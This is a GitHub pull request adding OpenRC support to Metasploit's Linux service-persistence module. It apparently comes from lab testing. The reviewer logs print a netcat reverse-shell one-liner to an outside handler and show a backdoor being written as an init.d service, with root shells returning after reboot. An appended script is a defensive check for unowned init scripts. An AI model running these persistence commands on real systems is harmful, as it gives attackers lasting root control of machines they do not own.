Add openrc to exploits/linux/local/service_persistence.rb #19480
Thanks for the enhancement @jvoisin! After making the small adjustment mentioned below, running the module with target = openrc returned a session right away and also when the target was rebooted.
Testing
Running the module
msf6 exploit(linux/local/service_persistence) > rexploit
[*] Reloading module...
[+] mkfifo /tmp/etbesqb; nc 172.16.199.1 5545 0</tmp/etbesqb | /bin/sh >/tmp/etbesqb 2>&1; rm /tmp/etbesqb
[*] Started reverse TCP handler on 172.16.199.1:5545
[!] SESSION may not be compatible with this module:
[!] * incompatible session type: meterpreter. This module works with: .
[*] Writing backdoor to /usr/local/bin/xABAF
[*] Writing service: /etc/init.d/bacMfRj
[*] Writing '/etc/init.d/bacMfRj' (140 bytes) ...
[*] Enabling service
[*] Starting service
[*] Command shell session 4 opened (172.16.199.1:5545 -> 172.16.199.132:45037) at 2024-10-01 14:55:36 -0700
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Rebooting the target
msf6 payload(cmd/unix/reverse_netcat) > to_handler
[*] Payload Handler Started as Job 4
[*] Started reverse TCP handler on 172.16.199.1:5545
msf6 payload(cmd/unix/reverse_netcat) > [*] 172.16.199.132 - Meterpreter session 3 closed. Reason: Died
msf6 payload(cmd/unix/reverse_netcat) > [*] Command shell session 5 opened (172.16.199.1:5545 -> 172.16.199.132:46423) at 2024-10-01 15:02:46 -0700
msf6 payload(cmd/unix/reverse_netcat) > sessions -i -1
[*] Starting interaction with 5...
uname -a
Linux localhost 6.6.53-0-lts #1-Alpine SMP PREEMPT_DYNAMIC 2024-10-01 07:56:52 x86_64 Linux
id
uid=0(root) gid=0(root)
Co-authored-by: Spencer McIntyre <[email protected]>
Thank you @smcintyre-r7 for fixing the issues <3
Thanks @jvoisin, works like a charm.
Testing
When running the module for the first time
msf6 exploit(linux/local/service_persistence) > run
[*] Started reverse TCP handler on 172.16.199.1:5757
[!] SESSION may not be compatible with this module:
[!] * incompatible session type: meterpreter. This module works with: .
[*] Writing '/etc/init.d/soLbpsw' (140 bytes) ...
[*] Command shell session 4 opened (172.16.199.1:5757 -> 172.16.199.132:40923) at 2024-10-02 14:31:49 -0700
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
uname -a
Linux localhost 6.6.53-0-lts #1-Alpine SMP PREEMPT_DYNAMIC 2024-10-01 07:56:52 x86_64 Linux
When rebooting the victim machine
msf6 payload(cmd/unix/reverse_netcat) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 payload(cmd/unix/reverse_netcat) > set lport 5757
lport => 5757
msf6 payload(cmd/unix/reverse_netcat) > to_handler
[*] Payload Handler Started as Job 0
[*] Started reverse TCP handler on 172.16.199.1:5757
msf6 payload(cmd/unix/reverse_netcat) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler cmd/unix/reverse_netcat tcp://172.16.199.1:5757
msf6 payload(cmd/unix/reverse_netcat) > [*] 172.16.199.132 - Meterpreter session 3 closed. Reason: Died
[*] Command shell session 6 opened (172.16.199.1:5757 -> 172.16.199.132:43189) at 2024-10-02 14:33:01 -0700
msf6 payload(cmd/unix/reverse_netcat) > sessions -i -1
[*] Starting interaction with 6...
id
uid=0(root) gid=0(root)
uname -a
Linux localhost 6.6.53-0-lts #1-Alpine SMP PREEMPT_DYNAMIC 2024-10-01 07:56:52 x86_64 Linux
Release Notes
This updates exploits/linux/local/service_persistence.rb to work on systems that are running OpenRC. This module will create a service on the box, and mark it for auto-restart.
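A defender-side check for the artifact visible in the test output above (an init script written to /etc/init.d and then enabled), added here as an example and not part of the PR or of Metasploit: it lists OpenRC init scripts that no apk package owns, together with the runlevels they are linked into. It assumes an Alpine host (apk database at /lib/apk/db/installed) and that an enabled service is linked under /etc/runlevels, as rc-update does; the function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example: list OpenRC init scripts that no apk package owns.
# Usage: audit_openrc [ROOT]  (ROOT is / or a mounted image; default /)

# apk's installed db: "F:<dir>" sets the directory, "R:<name>" is a file in it.
owned_files() {
    awk '/^F:/ { d = substr($0, 3) }
         /^R:/ { print "/" d "/" substr($0, 3) }' "$1/lib/apk/db/installed"
}

# Print "<script><TAB><runlevels, or - if not enabled>" for each unowned script.
audit_openrc() {
    root=${1:-/}; root=${root%/}
    owned=$(owned_files "$root") || return 2
    for f in "$root"/etc/init.d/*; do
        [ -f "$f" ] || continue
        name=${f##*/}
        printf '%s\n' "$owned" | grep -qxF "/etc/init.d/$name" && continue
        levels=
        for l in "$root"/etc/runlevels/*/"$name"; do
            # Runlevel links are absolute, so they dangle in a mounted image: test -L too.
            [ -e "$l" ] || [ -L "$l" ] || continue
            rl=${l%/*}; levels="${levels:+$levels,}${rl##*/}"
        done
        printf '/etc/init.d/%s\t%s\n' "$name" "${levels:--}"
    done
}

# Constructed sample tree (not taken from a real host): one packaged service,
# one unowned service that is enabled, one unowned service that is not.
make_sample_root() {
    r=$(mktemp -d)
    mkdir -p "$r/lib/apk/db" "$r/etc/init.d" "$r/etc/runlevels/default"
    printf 'P:openssh-server\nF:etc/init.d\nR:sshd\n\n' > "$r/lib/apk/db/installed"
    for s in sshd examplesvc leftover; do
        printf '#!/sbin/openrc-run\n' > "$r/etc/init.d/$s"
    done
    ln -s /etc/init.d/sshd "$r/etc/runlevels/default/sshd"
    ln -s /etc/init.d/examplesvc "$r/etc/runlevels/default/examplesvc"
    echo "$r"
}

sample=$(make_sample_root)
audit_openrc "$sample"
rm -rf "$sample"
```

Services an administrator wrote by hand are also unowned, so the output is a review list rather than a verdict; compare it against a known-good baseline for the host.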
Verification
List the steps needed to make sure this thing works
msfconsole
use exploits/linux/local/service_persistence